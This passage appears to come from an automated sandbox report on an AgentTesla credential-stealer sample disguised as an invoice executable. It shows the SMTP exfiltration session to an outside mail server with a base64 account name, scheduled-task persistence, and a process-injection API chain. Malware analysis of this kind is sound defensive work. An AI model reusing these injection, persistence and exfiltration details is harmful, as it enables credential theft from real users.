                                                                                                                        Aug 8, 2022 20:20:10.438348055 CEST49763587192.168.2.343.255.154.57
                                                                                                                        Aug 8, 2022 20:20:10.691970110 CEST5874976343.255.154.57192.168.2.3
                                                                                                                        Aug 8, 2022 20:20:10.692256927 CEST49763587192.168.2.343.255.154.57
                                                                                                                        Aug 8, 2022 20:20:10.985178947 CEST5874976343.255.154.57192.168.2.3
                                                                                                                        Aug 8, 2022 20:20:11.047105074 CEST5874976343.255.154.57192.168.2.3
                                                                                                                        Aug 8, 2022 20:20:11.150580883 CEST49763587192.168.2.343.255.154.57
                                                                                                                        Aug 8, 2022 20:20:11.445415020 CEST49763587192.168.2.343.255.154.57
                                                                                                                        Aug 8, 2022 20:20:11.698849916 CEST5874976343.255.154.57192.168.2.3
                                                                                                                        Aug 8, 2022 20:20:11.698982954 CEST5874976343.255.154.57192.168.2.3
                                                                                                                        Aug 8, 2022 20:20:11.732976913 CEST49763587192.168.2.343.255.154.57
                                                                                                                        Aug 8, 2022 20:20:11.733160019 CEST49763587192.168.2.343.255.154.57
                                                                                                                        Aug 8, 2022 20:20:11.733853102 CEST49763587192.168.2.343.255.154.57
                                                                                                                        Aug 8, 2022 20:20:11.733959913 CEST49763587192.168.2.343.255.154.57
                                                                                                                        Aug 8, 2022 20:20:11.986447096 CEST5874976343.255.154.57192.168.2.3
                                                                                                                        Aug 8, 2022 20:20:11.987082005 CEST5874976343.255.154.57192.168.2.3
                                                                                                                        Aug 8, 2022 20:20:11.989464998 CEST5874976343.255.154.57192.168.2.3
                                                                                                                        Aug 8, 2022 20:20:12.150705099 CEST49763587192.168.2.343.255.154.57

                                                                                                                        UDP Packets

                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                        Aug 8, 2022 20:20:08.416261911 CEST6333253192.168.2.38.8.8.8
                                                                                                                        Aug 8, 2022 20:20:08.437103987 CEST53633328.8.8.8192.168.2.3

                                                                                                                        DNS Queries

                                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                        Aug 8, 2022 20:20:08.416261911 CEST192.168.2.38.8.8.80x1581Standard query (0)mail.oceanskylogistics.inA (IP address)IN (0x0001)

                                                                                                                        DNS Answers

                                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                        Aug 8, 2022 20:20:08.437103987 CEST8.8.8.8192.168.2.30x1581No error (0)mail.oceanskylogistics.in43.255.154.57A (IP address)IN (0x0001)

                                                                                                                        SMTP Packets

                                                                                                                        TimestampSource PortDest PortSource IPDest IPCommands
                                                                                                                        Aug 8, 2022 20:20:09.421390057 CEST5874976343.255.154.57192.168.2.3220-sg2plcpnl0242.prod.sin2.secureserver.net ESMTP Exim 4.94.2 #2 Mon, 08 Aug 2022 11:20:09 -0700
                                                                                                                        220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                        220 and/or bulk e-mail.
                                                                                                                        Aug 8, 2022 20:20:09.421747923 CEST49763587192.168.2.343.255.154.57EHLO 320946
                                                                                                                        Aug 8, 2022 20:20:09.675313950 CEST5874976343.255.154.57192.168.2.3250-sg2plcpnl0242.prod.sin2.secureserver.net Hello 320946 [102.129.143.3]
                                                                                                                        250-SIZE 52428800
                                                                                                                        250-8BITMIME
                                                                                                                        250-PIPELINING
                                                                                                                        250-PIPE_CONNECT
                                                                                                                        250-AUTH PLAIN LOGIN
                                                                                                                        250-CHUNKING
                                                                                                                        250-STARTTLS
                                                                                                                        250-SMTPUTF8
                                                                                                                        250 HELP
                                                                                                                        Aug 8, 2022 20:20:09.849378109 CEST49763587192.168.2.343.255.154.57AUTH login aW1wb3J0QG9jZWFuc2t5bG9naXN0aWNzLmlu
                                                                                                                        Aug 8, 2022 20:20:10.103190899 CEST5874976343.255.154.57192.168.2.3334 UGFzc3dvcmQ6
                                                                                                                        Aug 8, 2022 20:20:10.390836954 CEST5874976343.255.154.57192.168.2.3235 Authentication succeeded
                                                                                                                        Aug 8, 2022 20:20:10.438348055 CEST49763587192.168.2.343.255.154.57MAIL FROM:<import@oceanskylogistics.in>
                                                                                                                        Aug 8, 2022 20:20:10.691970110 CEST5874976343.255.154.57192.168.2.3250 OK
                                                                                                                        Aug 8, 2022 20:20:10.692256927 CEST49763587192.168.2.343.255.154.57RCPT TO:<ajay@mbff.co.in>
                                                                                                                        Aug 8, 2022 20:20:11.047105074 CEST5874976343.255.154.57192.168.2.3250 Accepted
                                                                                                                        Aug 8, 2022 20:20:11.445415020 CEST49763587192.168.2.343.255.154.57DATA
                                                                                                                        Aug 8, 2022 20:20:11.698982954 CEST5874976343.255.154.57192.168.2.3354 Enter message, ending with "." on a line by itself
                                                                                                                        Aug 8, 2022 20:20:11.733959913 CEST49763587192.168.2.343.255.154.57.
                                                                                                                        Aug 8, 2022 20:20:11.989464998 CEST5874976343.255.154.57192.168.2.3250 OK id=1oL7MJ-00GBzl-Gn

                                                                                                                        Statistics

                                                                                                                        CPU Usage

                                                                                                                        Click to jump to process

                                                                                                                        Memory Usage

                                                                                                                        Click to jump to process

                                                                                                                        High Level Behavior Distribution

                                                                                                                        Click to dive into process behavior distribution

                                                                                                                        Behavior

                                                                                                                        Click to jump to process

                                                                                                                        System Behavior

                                                                                                                        General

                                                                                                                        Target ID:0
                                                                                                                        Start time:20:20:10
                                                                                                                        Start date:08/08/2022
                                                                                                                        Path:C:\Users\user\Desktop\INVOICE OUTSTANDING.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:"C:\Users\user\Desktop\INVOICE OUTSTANDING.exe"
                                                                                                                        Imagebase:0xa30000
                                                                                                                        File size:1031168 bytes
                                                                                                                        MD5 hash:0FA9D94D6393235F67A17B220902DBFA
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:.Net C# or VB.NET
                                                                                                                        Yara matches:
                                                                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.343081991.00000000046AD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000002.343081991.00000000046AD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: Windows_Trojan_AgentTesla_d3ac2b2f, Description: unknown, Source: 00000000.00000002.343081991.00000000046AD000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                        • Rule: Windows_Trojan_AgentTesla_e577e17e, Description: unknown, Source: 00000000.00000002.343081991.00000000046AD000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                        Reputation:low

                                                                                                                        General

                                                                                                                        Target ID:2
                                                                                                                        Start time:20:20:21
                                                                                                                        Start date:08/08/2022
                                                                                                                        Path:C:\Windows\System32\BackgroundTransferHost.exe
                                                                                                                        Wow64 process (32bit):false
                                                                                                                        Commandline:"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1
                                                                                                                        Imagebase:0x7ff6c2f90000
                                                                                                                        File size:36864 bytes
                                                                                                                        MD5 hash:02BA81746B929ECC9DB6665589B68335
                                                                                                                        Has elevated privileges:false
                                                                                                                        Has administrator privileges:false
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Reputation:moderate

                                                                                                                        General

                                                                                                                        Target ID:12
                                                                                                                        Start time:20:20:38
                                                                                                                        Start date:08/08/2022
                                                                                                                        Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ahgeNfsrA" /XML "C:\Users\user\AppData\Local\Temp\tmp69D2.tmp
                                                                                                                        Imagebase:0xe60000
                                                                                                                        File size:185856 bytes
                                                                                                                        MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Reputation:high

                                                                                                                        General

                                                                                                                        Target ID:13
                                                                                                                        Start time:20:20:40
                                                                                                                        Start date:08/08/2022
                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                        Wow64 process (32bit):false
                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                        Imagebase:0x7ff7c9170000
                                                                                                                        File size:625664 bytes
                                                                                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Reputation:high

                                                                                                                        General

                                                                                                                        Target ID:14
                                                                                                                        Start time:20:20:41
                                                                                                                        Start date:08/08/2022
                                                                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:{path}
                                                                                                                        Imagebase:0xf30000
                                                                                                                        File size:45152 bytes
                                                                                                                        MD5 hash:2867A3817C9245F7CF518524DFD18F28
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:.Net C# or VB.NET
                                                                                                                        Yara matches:
                                                                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000E.00000000.319592241.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 0000000E.00000000.319592241.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: Windows_Trojan_AgentTesla_d3ac2b2f, Description: unknown, Source: 0000000E.00000000.319592241.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                        • Rule: Windows_Trojan_AgentTesla_e577e17e, Description: unknown, Source: 0000000E.00000000.319592241.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000E.00000002.537876981.0000000003511000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000002.537876981.0000000003511000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        Reputation:high

                                                                                                                        General

                                                                                                                        Target ID:18
                                                                                                                        Start time:20:21:02
                                                                                                                        Start date:08/08/2022
                                                                                                                        Path:C:\Users\user\AppData\Roaming\kECjS\kECjS.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:"C:\Users\user\AppData\Roaming\kECjS\kECjS.exe"
                                                                                                                        Imagebase:0x990000
                                                                                                                        File size:45152 bytes
                                                                                                                        MD5 hash:2867A3817C9245F7CF518524DFD18F28
                                                                                                                        Has elevated privileges:false
                                                                                                                        Has administrator privileges:false
                                                                                                                        Programmed in:.Net C# or VB.NET
                                                                                                                        Antivirus matches:
                                                                                                                        • Detection: 0%, Metadefender, Browse
                                                                                                                        • Detection: 0%, ReversingLabs
                                                                                                                        Reputation:high

                                                                                                                        General

                                                                                                                        Target ID:19
                                                                                                                        Start time:20:21:03
                                                                                                                        Start date:08/08/2022
                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                        Wow64 process (32bit):false
                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                        Imagebase:0x7ff7c9170000
                                                                                                                        File size:625664 bytes
                                                                                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                        Has elevated privileges:false
                                                                                                                        Has administrator privileges:false
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Reputation:high

                                                                                                                        General

                                                                                                                        Target ID:20
                                                                                                                        Start time:20:21:11
                                                                                                                        Start date:08/08/2022
                                                                                                                        Path:C:\Users\user\AppData\Roaming\kECjS\kECjS.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:"C:\Users\user\AppData\Roaming\kECjS\kECjS.exe"
                                                                                                                        Imagebase:0x510000
                                                                                                                        File size:45152 bytes
                                                                                                                        MD5 hash:2867A3817C9245F7CF518524DFD18F28
                                                                                                                        Has elevated privileges:false
                                                                                                                        Has administrator privileges:false
                                                                                                                        Programmed in:.Net C# or VB.NET
                                                                                                                        Reputation:high

                                                                                                                        General

                                                                                                                        Target ID:21
                                                                                                                        Start time:20:21:11
                                                                                                                        Start date:08/08/2022
                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                        Wow64 process (32bit):false
                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                        Imagebase:0x7ff7c9170000
                                                                                                                        File size:625664 bytes
                                                                                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                        Has elevated privileges:false
                                                                                                                        Has administrator privileges:false
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Reputation:high

                                                                                                                        Disassembly

                                                                                                                        Reset < >

                                                                                                                          Execution Graph

                                                                                                                          Execution Coverage:10.8%
                                                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                                                          Signature Coverage:2%
                                                                                                                          Total number of Nodes:147
                                                                                                                          Total number of Limit Nodes:8
                                                                                                                          execution_graph 20834 8320db2 20838 8321c10 20834->20838 20842 8321c08 20834->20842 20835 8320dd6 20839 8321c5b WriteProcessMemory 20838->20839 20841 8321cac 20839->20841 20841->20835 20843 8321c0c WriteProcessMemory 20842->20843 20845 8321cac 20843->20845 20845->20835 20846 83206b1 20847 83206b7 20846->20847 20849 8321c10 WriteProcessMemory 20847->20849 20850 8321c08 WriteProcessMemory 20847->20850 20848 8320716 20849->20848 20850->20848 20981 78bbee8 20982 78bbf30 VirtualProtect 20981->20982 20983 78bbf6a 20982->20983 20984 83219d8 20985 8321a20 SetThreadContext 20984->20985 20987 8321a5e 20985->20987 20988 14bc0a0 DuplicateHandle 20989 14bc136 20988->20989 20990 832101f 20992 8321c10 WriteProcessMemory 20990->20992 20993 8321c08 WriteProcessMemory 20990->20993 20991 8321037 20992->20991 20993->20991 20994 8322440 20995 8322466 20994->20995 20996 83225cb 20994->20996 20995->20996 20999 83226c0 PostMessageW 20995->20999 21001 83226bb PostMessageW 20995->21001 21000 832272c 20999->21000 21000->20995 21002 832272c 21001->21002 21002->20995 20851 14b6b58 20852 14b6b68 20851->20852 20855 14b66bc 20852->20855 20854 14b6b75 20856 14b66c7 20855->20856 20859 14b66dc 20856->20859 20858 14b6c25 20858->20854 20860 14b66e7 20859->20860 20863 14b670c 20860->20863 20862 14b6d02 20862->20858 20864 14b6717 20863->20864 20867 14b673c 20864->20867 20866 14b6e02 20866->20862 20868 14b6747 20867->20868 20870 14b751e 20868->20870 20873 14b9658 20868->20873 20869 14b755c 20869->20866 20870->20869 20877 14bb798 20870->20877 20882 14b9680 20873->20882 20885 14b9690 20873->20885 20874 14b966e 20874->20870 20878 14bb7c9 20877->20878 20879 14bb7ed 20878->20879 20908 14bb949 20878->20908 20912 14bb958 20878->20912 20879->20869 20888 14b9788 20882->20888 20883 14b969f 20883->20874 20886 14b969f 20885->20886 20887 14b9788 2 API calls 20885->20887 20886->20874 20887->20886 20889 14b979b 20888->20889 20890 14b97b3 20889->20890 20896 14b9a02 20889->20896 20900 14b9a10 20889->20900 20890->20883 20891 14b97ab 20891->20890 20892 14b99b0 GetModuleHandleW 20891->20892 20893 14b99dd 20892->20893 20893->20883 20897 14b9a10 20896->20897 20898 14b9a49 20897->20898 20904 14b8af8 20897->20904 20898->20891 20901 14b9a24 20900->20901 20902 14b9a49 20901->20902 20903 14b8af8 LoadLibraryExW 20901->20903 20902->20891 20903->20902 20905 14b9bf0 LoadLibraryExW 20904->20905 20907 14b9c69 20905->20907 20907->20898 20909 14bb952 20908->20909 20910 14bb99f 20909->20910 20916 14ba47c 20909->20916 20910->20879 20913 14bb965 20912->20913 20914 14bb99f 20913->20914 20915 14ba47c 2 API calls 20913->20915 20914->20879 20915->20914 20917 14ba487 20916->20917 20919 14bc698 20917->20919 20920 14bbc94 20917->20920 20919->20919 20921 14bbc9f 20920->20921 20922 14b673c 2 API calls 20921->20922 20923 14bc707 20922->20923 20927 14be490 20923->20927 20933 14be478 20923->20933 20924 14bc740 20924->20919 20929 14be4c1 20927->20929 20930 14be50e 20927->20930 20928 14be4cd 20928->20924 20929->20928 20938 14be7c8 20929->20938 20942 14be7d8 20929->20942 20930->20924 20935 14be490 20933->20935 20934 14be4cd 20934->20924 20935->20934 20936 14be7c8 2 API calls 20935->20936 20937 14be7d8 2 API calls 20935->20937 20936->20934 20937->20934 20939 14be7d8 20938->20939 20940 14b9788 LoadLibraryExW GetModuleHandleW 20939->20940 20941 14be7e1 20940->20941 20941->20930 20943 14b9788 LoadLibraryExW GetModuleHandleW 20942->20943 20944 14be7e1 20943->20944 20944->20930 21003 14bba70 GetCurrentProcess 21004 14bbaea GetCurrentThread 21003->21004 21005 14bbae3 21003->21005 21006 14bbb20 21004->21006 21007 14bbb27 GetCurrentProcess 21004->21007 21005->21004 21006->21007 21010 14bbb5d 21007->21010 21008 14bbb85 GetCurrentThreadId 21009 14bbbb6 21008->21009 21010->21008 21011 8320cc9 21015 8321dc3 21011->21015 21018 8321dc8 21011->21018 21012 8320cd4 21016 8321e09 ResumeThread 21015->21016 21017 8321e36 21016->21017 21017->21012 21019 8321e09 ResumeThread 21018->21019 21020 8321e36 21019->21020 21020->21012 20945 83202ae 20947 83200ad 20945->20947 20946 8320264 20947->20946 20950 8321668 20947->20950 20954 832165c 20947->20954 20951 83216e7 CreateProcessW 20950->20951 20953 83217d0 20951->20953 20955 8321660 CreateProcessW 20954->20955 20957 83217d0 20955->20957 20958 832126d 20962 8321a93 20958->20962 20966 8321a98 20958->20966 20959 8321285 20963 8321b07 ReadProcessMemory 20962->20963 20965 8321a97 20962->20965 20964 8321b26 20963->20964 20964->20959 20965->20963 20967 8321ae3 ReadProcessMemory 20966->20967 20969 8321b26 20967->20969 20969->20959 20970 8320b6d 20974 8321b63 20970->20974 20978 8321b68 20970->20978 20971 8320b8a 20975 8321bd7 20974->20975 20976 8321b67 VirtualAllocEx 20974->20976 20975->20971 20976->20975 20979 8321bab VirtualAllocEx 20978->20979 20980 8321bd7 20979->20980 20980->20971

                                                                                                                          Executed Functions

                                                                                                                          Function 078B2D00 Relevance: 4.4, Strings: 3, Instructions: 651COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.351130975.00000000078B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078B0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_78b0000_INVOICE OUTSTANDING.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: D0k$Xck$Xck
                                                                                                                          • API String ID: 0-1795155639
                                                                                                                          • Opcode ID: ebba89c9b62f880935ef1b658df012dc044a88761eb5061926322429492ac22d
                                                                                                                          • Instruction ID: 85ce663823a3fde4bbae2bb80d4b4474e4f40783417561b91acaed122c5dfc87
                                                                                                                          • Opcode Fuzzy Hash: ebba89c9b62f880935ef1b658df012dc044a88761eb5061926322429492ac22d
                                                                                                                          • Instruction Fuzzy Hash: 3132C2B1B042198FCB34DF69C8506AEBBB6EF95204F19C0A9D409DB761DB31DC46CB92
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 083220B9 Relevance: 4.0, Strings: 3, Instructions: 217COMMON
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 255 83220b9-83220c0 257 832213a-8322143 255->257 258 8322145 257->258 259 832214a-8322178 257->259 258->259 261 832217a 259->261 262 83221be-83221c7 259->262 263 8322181-832219d 261->263 262->263 264 83221a6-83221a7 263->264 265 832219f 263->265 271 83221dc-83221f1 264->271 265->261 265->262 265->264 266 83221f2 265->266 267 83222b4-83222cf 265->267 268 83222d4-83222e9 265->268 269 8322379-832237a 265->269 270 8322239 265->270 265->271 272 832229c-83222af 265->272 273 832235d-8322366 265->273 274 8322320-832232a 265->274 275 8322224-8322237 265->275 276 8322284-8322297 265->276 277 8322308-832231b 265->277 278 83221c9-83221d7 265->278 279 83221a9-83221bc 265->279 280 83222ee-8322303 265->280 281 832224d-832227f 265->281 282 83221f9-8322215 266->282 267->282 268->282 290 8322243-832224b 270->290 271->266 272->282 273->257 285 832236c-8322374 273->285 283 832232c-832233b 274->283 284 832233d-8322344 274->284 275->282 276->282 277->282 278->268 279->263 280->282 281->282 287 8322217 282->287 288 832221e-832221f 282->288 291 832234b-8322358 283->291 284->291 285->282 287->266 287->267 287->268 287->269 287->270 287->272 287->273 287->274 287->275 287->276 287->277 287->280 287->281 287->288 288->269 290->282 291->282
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.352700809.0000000008320000.00000040.00000800.00020000.00000000.sdmp, Offset: 08320000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_8320000_INVOICE OUTSTANDING.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: ./e$M]7e$Zz4:
                                                                                                                          • API String ID: 0-869570009
                                                                                                                          • Opcode ID: 8dc5fb4b572ff1c2312f50726e8a86e6e4f77b37e15b273d2677848949e220c0
                                                                                                                          • Instruction ID: 6b22090424faaac6b5e3dc68c3822b73f7036c57005ae799fd8d0daefbaf201b
                                                                                                                          • Opcode Fuzzy Hash: 8dc5fb4b572ff1c2312f50726e8a86e6e4f77b37e15b273d2677848949e220c0
                                                                                                                          • Instruction Fuzzy Hash: 8B818D70E19218DFCB14CFA9D88499EFFB6EF89311F24A82AD516BB254D734A542CF04
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 078B62B5 Relevance: 1.7, Strings: 1, Instructions: 434COMMON
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 392 78b62b5-78b62c4 393 78b6322-78b6348 392->393 394 78b62c6-78b6310 392->394 399 78b634a-78b636c 393->399 400 78b63a3-78b63a5 393->400 397 78b6312-78b6314 394->397 398 78b6374-78b638e 394->398 402 78b636d-78b6373 397->402 403 78b6316-78b6321 397->403 404 78b6390-78b639a 398->404 399->402 401 78b63a8 400->401 405 78b63a9-78b63cd 401->405 402->398 403->393 409 78b639c-78b63a0 404->409 410 78b63a1-78b63a2 404->410 407 78b63cf 405->407 408 78b63d4-78b6410 405->408 407->408 484 78b6412 call 78b69c9 408->484 485 78b6412 call 78b69d8 408->485 409->404 411 78b63a2 409->411 410->400 410->405 411->405 413 78b63a4-78b63a5 411->413 413->401 414 78b6418 415 78b641f-78b643b 414->415 416 78b643d 415->416 417 78b6444-78b6445 415->417 416->414 416->417 418 78b644a-78b6456 416->418 419 78b66c9-78b66e9 416->419 420 78b65cf-78b65db 416->420 421 78b654c-78b6558 416->421 422 78b6802-78b6815 416->422 423 78b6502-78b6517 416->423 424 78b6580-78b6595 416->424 425 78b67c6-78b67e6 416->425 426 78b6644-78b6650 416->426 427 78b659a-78b65b1 416->427 428 78b649e-78b64b5 416->428 429 78b651c-78b6520 416->429 430 78b6791-78b679a 416->430 431 78b64d6-78b64eb 416->431 432 78b6695-78b66a1 416->432 433 78b67eb-78b67fd 416->433 434 78b66ee-78b66fa 416->434 435 78b662d-78b663f 416->435 436 78b676c-78b678c 416->436 437 78b6725-78b6737 416->437 438 78b64ba-78b64d1 416->438 439 78b65f9-78b6605 416->439 440 78b673c-78b6740 416->440 441 78b6471-78b6475 416->441 442 78b64f0-78b64fd 416->442 443 78b65b6-78b65ca 416->443 417->422 464 78b6458 418->464 465 78b645d-78b646f 418->465 419->415 454 78b65dd 420->454 455 78b65e2 420->455 452 78b655a 421->452 453 78b655f-78b657b 421->453 423->415 424->415 425->415 458 78b6652 426->458 459 78b6657-78b666d 426->459 427->415 428->415 450 78b6533-78b653a 429->450 451 78b6522-78b6531 429->451 448 78b67ad-78b67b4 430->448 449 78b679c-78b67ab 430->449 431->415 460 78b66a8-78b66c4 432->460 461 78b66a3 432->461 433->415 462 78b66fc 434->462 463 78b6701-78b6720 434->463 435->415 436->415 437->415 438->415 456 78b660c-78b6628 439->456 457 78b6607 439->457 444 78b6753-78b675a 440->444 445 78b6742-78b6751 440->445 446 78b6488-78b648f 441->446 447 78b6477-78b6486 441->447 442->415 443->415 466 78b6761-78b6767 444->466 445->466 467 78b6496-78b649c 446->467 447->467 469 78b67bb-78b67c1 448->469 449->469 471 78b6541-78b6547 450->471 451->471 452->453 453->415 454->455 476 78b65ec-78b65f4 455->476 456->415 457->456 458->459 481 78b666f 459->481 482 78b6674-78b6690 459->482 460->415 461->460 462->463 463->415 464->465 465->415 466->415 467->415 469->415 471->415 476->415 481->482 482->415 484->414 485->414
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.351130975.00000000078B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078B0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_78b0000_INVOICE OUTSTANDING.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: `q~'
                                                                                                                          • API String ID: 0-1541917547
                                                                                                                          • Opcode ID: 136dafb88db706618da9ae1393cd2cddb8b3f247bb6c22e2796c34278d01b207
                                                                                                                          • Instruction ID: f91a79b3ea4c69c5e7a8e5b3c4057d73b15cc9780bfd338ba503b828963ce66a
                                                                                                                          • Opcode Fuzzy Hash: 136dafb88db706618da9ae1393cd2cddb8b3f247bb6c22e2796c34278d01b207
                                                                                                                          • Instruction Fuzzy Hash: 790238B0A1520ADFCB14CF99D4818AEFBF2FF59310B24946AD506EB314E734A952CF90
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 078B625B Relevance: 1.7, Strings: 1, Instructions: 430COMMON
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 486 78b625b-78b6263 487 78b626a 486->487 488 78b6265-78b6266 486->488 489 78b626c-78b6274 487->489 490 78b62d6-78b6310 487->490 488->487 489->490 491 78b6312-78b6314 490->491 492 78b6374-78b638e 490->492 493 78b636d-78b6373 491->493 494 78b6316-78b6348 491->494 495 78b6390-78b639a 492->495 493->492 502 78b63a3-78b63a5 494->502 503 78b634a-78b636c 494->503 499 78b639c-78b63a0 495->499 500 78b63a1-78b63a2 495->500 499->495 504 78b63a2 499->504 501 78b63a9-78b63cd 500->501 500->502 505 78b63cf 501->505 506 78b63d4-78b6410 501->506 507 78b63a8 502->507 503->493 504->501 508 78b63a4-78b63a5 504->508 505->506 580 78b6412 call 78b69c9 506->580 581 78b6412 call 78b69d8 506->581 507->501 508->507 510 78b6418 511 78b641f-78b643b 510->511 512 78b643d 511->512 513 78b6444-78b6445 511->513 512->510 512->513 514 78b644a-78b6456 512->514 515 78b66c9-78b66e9 512->515 516 78b65cf-78b65db 512->516 517 78b654c-78b6558 512->517 518 78b6802-78b6815 512->518 519 78b6502-78b6517 512->519 520 78b6580-78b6595 512->520 521 78b67c6-78b67e6 512->521 522 78b6644-78b6650 512->522 523 78b659a-78b65b1 512->523 524 78b649e-78b64b5 512->524 525 78b651c-78b6520 512->525 526 78b6791-78b679a 512->526 527 78b64d6-78b64eb 512->527 528 78b6695-78b66a1 512->528 529 78b67eb-78b67fd 512->529 530 78b66ee-78b66fa 512->530 531 78b662d-78b663f 512->531 532 78b676c-78b678c 512->532 533 78b6725-78b6737 512->533 534 78b64ba-78b64d1 512->534 535 78b65f9-78b6605 512->535 536 78b673c-78b6740 512->536 537 78b6471-78b6475 512->537 538 78b64f0-78b64fd 512->538 539 78b65b6-78b65ca 512->539 513->518 560 78b6458 514->560 561 78b645d-78b646f 514->561 515->511 550 78b65dd 516->550 551 78b65e2 516->551 548 78b655a 517->548 549 78b655f-78b657b 517->549 519->511 520->511 521->511 554 78b6652 522->554 555 78b6657-78b666d 522->555 523->511 524->511 546 78b6533-78b653a 525->546 547 78b6522-78b6531 525->547 544 78b67ad-78b67b4 526->544 545 78b679c-78b67ab 526->545 527->511 556 78b66a8-78b66c4 528->556 557 78b66a3 528->557 529->511 558 78b66fc 530->558 559 78b6701-78b6720 530->559 531->511 532->511 533->511 534->511 552 78b660c-78b6628 535->552 553 78b6607 535->553 540 78b6753-78b675a 536->540 541 78b6742-78b6751 536->541 542 78b6488-78b648f 537->542 543 78b6477-78b6486 537->543 538->511 539->511 562 78b6761-78b6767 540->562 541->562 563 78b6496-78b649c 542->563 543->563 565 78b67bb-78b67c1 544->565 545->565 567 78b6541-78b6547 546->567 547->567 548->549 549->511 550->551 572 78b65ec-78b65f4 551->572 552->511 553->552 554->555 577 78b666f 555->577 578 78b6674-78b6690 555->578 556->511 557->556 558->559 559->511 560->561 561->511 562->511 563->511 565->511 567->511 572->511 577->578 578->511 580->510 581->510
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.351130975.00000000078B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078B0000, based on PE: false
